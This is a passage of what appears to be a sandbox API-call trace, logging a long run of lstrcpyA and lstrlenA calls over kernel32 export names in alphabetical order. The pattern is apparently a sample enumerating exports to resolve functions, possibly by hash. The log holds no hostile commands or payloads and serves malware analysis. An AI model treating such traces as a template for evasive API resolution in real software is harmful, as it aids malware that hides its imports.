lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.573] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.573] lstrlenA (lpString="ADDATOMA") returned 8 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.573] lstrlenA (lpString="ADDATOMW") returned 8 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.573] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.573] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.573] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.573] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.573] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.573] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.573] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.573] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.573] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.573] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.573] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.573] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.573] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.573] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.573] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.574] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.574] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.574] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.574] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.574] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.574] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.574] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.574] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.574] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.574] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.574] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.574] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.574] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.574] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.574] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.574] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.574] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.574] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.574] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.575] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.575] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.575] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.575] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.575] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.575] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.575] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.575] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.575] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.575] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.575] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.575] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.575] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.575] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.575] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.575] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.575] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.575] lstrlenA (lpString="BEEP") returned 4 [0084.575] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.575] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.576] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.576] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.576] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.576] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.576] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.576] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.576] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.576] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.576] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.576] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.576] lstrlenA (lpString="CANCELIO") returned 8 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.576] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.576] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.576] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.576] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.576] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.576] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.576] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.576] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.576] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.577] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.577] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.577] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.577] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.577] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.577] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.577] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.577] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.577] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.577] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.577] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.577] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.577] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.577] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.577] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.577] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.577] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.577] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.577] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.577] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.578] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.578] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.578] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.578] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.578] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.578] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.578] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.578] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.578] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.578] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.578] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.578] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.578] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.578] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.578] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.578] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.578] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.578] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.578] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.579] lstrlenA (lpString="COPYFILEA") returned 9 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.579] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.579] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.579] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.579] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.579] lstrlenA (lpString="COPYFILEW") returned 9 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.579] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.579] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.579] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.579] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.579] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.579] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.579] lstrlenA 